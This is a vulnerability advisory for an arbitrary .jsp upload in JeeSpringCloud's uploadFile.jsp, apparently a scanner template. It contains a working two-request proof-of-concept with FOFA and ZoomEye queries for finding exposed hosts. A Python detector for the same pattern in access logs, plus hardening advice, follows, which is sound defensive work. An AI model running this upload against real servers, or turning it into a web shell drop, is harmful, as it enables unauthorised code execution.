Vulnerability description
JeeSpringCloud is a free, open-source Java rapid-development platform for internet cloud applications. Requesting /static/uploadify/uploadFile.jsp on a JeeSpringCloud instance allows arbitrary file upload.
FOFA: header="com.jeespring.session.id"
ZoomEye: header:"com.jeespring.session.id"
id: jeespringcloud-uploadfile-fileupload

info:
  name: JeeSpringCloud uploadFile.jsp 任意文件上传
  author: zan8in
  severity: critical
  verified: true
  description: |-
    JeeSpringCloud 是一款免费开源的 Java 互联网云快速开发平台,JeeSpringCloud 访问 /static/uploadify/uploadFile.jsp 可上传任意文件。
    FOFA: header="com.jeespring.session.id"
    ZoomEye: header:"com.jeespring.session.id"
  tags: jeespringcloud,fileuplaod
  created: 2023/11/06

set:
  randstr: randomLowercase(6)
  randbody: randomLowercase(56)
  rboundary: randomLowercase(8)

rules:
  r0:
    request:
      method: POST
      path: /static/uploadify/uploadFile.jsp?uploadPath=/static/uploadify/
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
      body: "\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"fileshare\"; filename=\"{{randstr}}.jsp\"\r\n\
        Content-Type: image/jpeg\r\n\
        \r\n\
        {{randbody}}\r\n\
        \r\n\
        ------WebKitFormBoundary{{rboundary}}--\r\n\
        "
    expression: response.status == 200 && response.body.bcontains(b'.jsp')
    output:
      search: '"(?P<bodystr>.+?).jsp".bsubmatch(response.body)'
      bodystr: search["bodystr"]
  r1:
    request:
      method: GET
      path: /static/uploadify/{{bodystr}}.jsp
    expression: response.status == 200 && response.body.bcontains(bytes(randbody))

expression: r0() && r1()
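The template above exercises a two-step pattern: a POST to /static/uploadify/uploadFile.jsp that writes a .jsp into /static/uploadify/, then a GET that fetches it back. The same pattern is what a defender would look for in web-server access logs. The following is an added detection example, not part of the original POC and not JeeSpringCloud's own code; it assumes access logs in Combined Log Format, and the log lines embedded in it are constructed samples. Only the two endpoint paths come from the template.

```python
"""
Flag the upload-then-fetch pattern from the POC in access logs:
  1. POST to /static/uploadify/uploadFile.jsp (upload attempt, any status)
  2. GET of a .jsp under /static/uploadify/ (a script in the upload directory),
     escalated when the same client earlier got HTTP 200 on the upload.
"""
import re

# Constructed sample access log (Combined Log Format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [06/Nov/2023:10:00:01 +0000] "GET /index.jsp HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [06/Nov/2023:10:00:02 +0000] "POST /static/uploadify/uploadFile.jsp?uploadPath=/static/uploadify/ HTTP/1.1" 200 87 "-" "Mozilla/5.0"
203.0.113.5 - - [06/Nov/2023:10:00:03 +0000] "GET /static/uploadify/abcdef.jsp HTTP/1.1" 200 56 "-" "Mozilla/5.0"
198.51.100.9 - - [06/Nov/2023:10:05:00 +0000] "GET /static/uploadify/uploadify.css HTTP/1.1" 200 3011 "-" "Mozilla/5.0"
198.51.100.9 - - [06/Nov/2023:10:05:01 +0000] "POST /static/uploadify/uploadFile.jsp?uploadPath=/static/uploadify/ HTTP/1.1" 500 0 "-" "curl/8.0"
"""

# Combined Log Format: ip ident user [ts] "METHOD path proto" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Paths taken from the POC template above.
UPLOAD_ENDPOINT = "/static/uploadify/uploadFile.jsp"
UPLOAD_DIR = "/static/uploadify/"


def parse_line(line):
    """Parse one access log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]  # drop the query string
    return rec


def find_suspicious(log_text):
    """
    Return findings as (ip, kind, path, status) tuples in log order.
    kind is one of:
      upload_attempt        POST to the upload endpoint (any status)
      uploaded_jsp_fetched  GET of a .jsp in the upload dir by a client whose
                            earlier upload POST returned 200
      jsp_in_upload_dir     GET of a .jsp in the upload dir with no prior
                            successful upload seen from that client
    """
    findings = []
    successful_uploaders = set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"]
        if rec["method"] == "POST" and path == UPLOAD_ENDPOINT:
            findings.append((rec["ip"], "upload_attempt", path, rec["status"]))
            if rec["status"] == 200:
                successful_uploaders.add(rec["ip"])
        elif (rec["method"] == "GET"
              and path.startswith(UPLOAD_DIR)
              and path.lower().endswith(".jsp")
              and path != UPLOAD_ENDPOINT):
            kind = ("uploaded_jsp_fetched" if rec["ip"] in successful_uploaders
                    else "jsp_in_upload_dir")
            findings.append((rec["ip"], kind, path, rec["status"]))
    return findings


if __name__ == "__main__":
    for ip, kind, path, status in find_suspicious(SAMPLE_LOG):
        print(f"{ip:15} {kind:22} {status} {path}")
```

Run it against a real log by replacing SAMPLE_LOG with the file contents. A GET of any .jsp under the upload directory is already noteworthy on its own, since a static asset directory should not be serving scripts; the correlation with a preceding successful POST only raises confidence. Blocking script extensions in that directory at the web server, or serving it with no JSP handler at all, removes the condition the POC relies on.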